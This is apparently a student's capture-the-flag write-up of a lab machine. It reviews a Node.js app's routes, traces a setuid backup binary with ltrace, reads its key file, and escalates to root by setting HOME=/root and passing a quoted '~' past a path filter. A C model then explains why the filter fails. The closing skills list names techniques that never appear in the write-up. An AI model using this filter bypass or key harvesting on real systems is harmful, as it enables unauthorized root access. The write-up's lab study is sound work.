
  app.get('/api/users/?', function (req, res) {
    db.collection('users').find().toArray(function (error, docs) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!docs) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(docs);
      }
    });
  });

  app.get('/api/users/latest', function (req, res) {
    db.collection('users').find({ is_admin: false }).toArray(function (error, docs) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!docs) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(docs);
      }
    });
  });

  app.get('/api/users/:username', function (req, res) {
    db.collection('users').findOne({ username: req.params.username }, function (error, doc) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!doc) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(doc);
      }
    });
  });

  app.get('/api/session', function (req, res) {
    if (req.session.user) {
      res.send({
        authenticated: true,
        user: req.session.user
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

  app.post('/api/session/authenticate', function (req, res) {
    var failureResult = {
      error: true,
      message: 'Authentication failed'
    };

    if (!req.body.username || !req.body.password) {
      res.send(failureResult);
      return;
    }

    db.collection('users').findOne({ username: req.body.username }, function (error, doc) {
      if (error) {
        res.status(500).send({
          message:"Uh oh, something went wrong!",
          error: true
        });

        return;
      }

      if (!doc) {
        res.send(failureResult);
        return;
      }

      var hash = crypto.createHash('sha256');
      var cipherText = hash.update(req.body.password).digest('hex');

      if (cipherText == doc.password) {
        req.session.user = doc;
        res.send({
          success: true
        });
      }
      else {
        res.send({
          success: false
        })
      }
    });
  });

  app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

      proc.on("exit", function(exitCode) {
        res.header("Content-Type", "text/plain");
        res.header("Content-Disposition", "attachment; filename=myplace.backup");
        res.send(backup);
      });

      proc.stdout.on("data", function(chunk) {
        backup += chunk;
      });

      proc.stdout.on("end", function() {
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

  app.use(function(req, res, next){
    res.sendFile('app.html', { root: __dirname });
  });

  app.listen(3000, function () {
    console.log('MyPlace app listening on port 3000!')
  });

});
backup -q testing /root
backup -q /root
backup testing testing /root

---
____________________________________________________
            /                                                    \
           |    _____________________________________________     |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |             Secure Backup v1.0              |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |_____________________________________________|    |
           |                                                      |
            \_____________________________________________________/
                   \_______________________________________/
                _______________________________________________
             _-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
          _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-_
       _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
    _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
 _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'


 [!] Ah-ah-ah! You didn't say the magic word!

ltrace

  • We can use ltrace to display calls that are made to shared libraries
ltrace backup testing testing /root
strncpy(0xff8251a8, "testing", 100)              = 0xff8251a8
strcpy(0xff825191, "/")                          = 0xff825191
strcpy(0xff82519d, "/")                          = 0xff82519d
strcpy(0xff825127, "/e")                         = 0xff825127
strcat("/e", "tc")                               = "/etc"
strcat("/etc", "/m")                             = "/etc/m"
strcat("/etc/m", "yp")                           = "/etc/myp"
strcat("/etc/myp", "la")                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                  = 0x98ff410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("testing", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("testing", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("testing", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x98ff410)                     = 0xff824d3f
strcspn("\n", "\n")                              = 0
strcmp("testing", "")                            = 1
fgets(nil, 1000, 0x98ff410)                      = 0
strcpy(0xff823d78, "Ah-ah-ah! You didn't say the mag"...) = 0xff823d78
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!
  • The binary reads its keys from /etc/myplace/keys, which we can read ourselves
  • It then compares the key we entered against each line with strcmp, e.g. strcmp("testing", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
cat /etc/myplace/keys
---
	a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
	45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
	3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
---
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root  # let's try with the last key
---
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
echo -n "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" | base64 -d > root.zip
unzip root.zip          # the archive is password protected

7z e root.zip           # [e] Extract files from archive; either tool works
password: magicword
cat root.txt

QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
  • No success: when the path points at /root the archive contains this troll face instead of the flag, so the binary filters that path before backing it up. We need to see what the filter actually looks at.
ltrace backup dsa testing /tmp

strncpy(0xffc10e98, "testing", 100)                                                   = 0xffc10e98
strcpy(0xffc10e81, "/")                                                               = 0xffc10e81
strcpy(0xffc10e8d, "/")                                                               = 0xffc10e8d
strcpy(0xffc10e17, "/e")                                                              = 0xffc10e17
strcat("/e", "tc")                                                                    = "/etc"
strcat("/etc", "/m")                                                                  = "/etc/m"
strcat("/etc/m", "yp")                                                                = "/etc/myp"
strcat("/etc/myp", "la")                                                              = "/etc/mypla"
strcat("/etc/mypla", "ce")                                                            = "/etc/myplace"
strcat("/etc/myplace", "/k")                                                          = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                                                        = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                                                       = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                                                       = 0x8307410
  • The filter only inspects the literal path string we pass; a quoted "~" is not on its list and goes through untouched.
  • The path ends up in a shell command, and the shell expands "~" to $HOME after the filter has already run. HOME is an environment variable under our control, so we point it at /root.
export HOME=/root
backup test 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
or
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
  • The output is once again a base64-encoded zip archive. Decode it and extract it with the same password as before.
echo "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" | base64 -d > root.zip
unzip root.zip
password: magicword
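To make the two observations from the ltrace output concrete, here is a small C model of the binary's behaviour. This is an added example, not the box's backup binary and not code from the original writeup. The key check mirrors the fgets/strcspn/strcmp loop shown in the trace. The denylist contents (a strstr-style substring check for "/root" and "..") and the use of popen() in place of system() are assumptions made for the demonstration; the page only shows that a /root path was rejected and a quoted "~" was not. The demo key file is constructed and contains none of the real keys.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of the key check seen in the ltrace output: read the keys file line
 * by line with fgets(), cut it at the newline with strcspn() and strcmp()
 * the user-supplied key against every entry. As in the trace, the trailing
 * blank line of the file is compared as well. */
int key_is_valid(const char *keyfile, const char *key)
{
    FILE *f = fopen(keyfile, "r");
    if (f == NULL)
        return 0;
    char line[1000];
    int found = 0;
    while (fgets(line, sizeof line, f) != NULL) {
        line[strcspn(line, "\n")] = '\0';
        if (strcmp(key, line) == 0) {
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}

/* Assumed denylist (not taken from the binary): a strstr()-style substring
 * check on the raw argument. "/root" is rejected, "~" is not, because the
 * filter only ever sees the literal string the caller typed. */
static const char *const denied[] = { "/root", "..", NULL };

int path_blocked(const char *path)
{
    for (size_t i = 0; denied[i] != NULL; i++)
        if (strstr(path, denied[i]) != NULL)
            return 1;
    return 0;
}

/* The path is then spliced, deliberately unquoted, into a command line for
 * /bin/sh, which is where a bare "~" becomes $HOME. popen() stands in for
 * system() so the expanded path can be captured. Returns 0 on success. */
int shell_expand(const char *path, char *out, size_t outlen)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "printf '%%s' %s", path);
    FILE *p = popen(cmd, "r");
    if (p == NULL)
        return -1;
    size_t n = fread(out, 1, outlen - 1, p);
    out[n] = '\0';
    return pclose(p) == 0 ? 0 : -1;
}

/* Writes constructed demo keys (not the box's real keys) to path. */
int write_demo_keys(const char *path)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs("0000000000000000000000000000000000000000000000000000000000000001\n"
          "0000000000000000000000000000000000000000000000000000000000000002\n"
          "\n", f);
    return fclose(f);
}

int main(void)
{
    const char *keys = "/tmp/node_demo_keys";
    if (write_demo_keys(keys) != 0)
        return 1;
    printf("key 'testing' valid: %d\n", key_is_valid(keys, "testing"));
    printf("key ...0002 valid:   %d\n", key_is_valid(keys,
           "0000000000000000000000000000000000000000000000000000000000000002"));

    setenv("HOME", "/root", 1);            /* what `export HOME=/root` does */
    char resolved[256];
    const char *args[] = { "/root", "~" };
    for (int i = 0; i < 2; i++) {
        if (path_blocked(args[i]))
            printf("%-6s blocked by filter\n", args[i]);
        else if (shell_expand(args[i], resolved, sizeof resolved) == 0)
            printf("%-6s passes filter, shell expands it to %s\n", args[i], resolved);
    }
    remove(keys);
    return 0;
}
```

The lesson the model makes visible is the ordering: the denylist runs on the string before the shell does its expansion, so any construct the shell rewrites (tilde, variables, globs) gives the caller a way to name a forbidden path without ever typing it. A filter that resolves the path first (realpath) or, better, never hands user input to a shell at all, would not have this gap.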

Skills Learned

  • Bypassing user agent filtering
  • Brute forcing JSON payloads
  • Exploiting buffer overflows
  • Bypassing ASLR and NX

Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing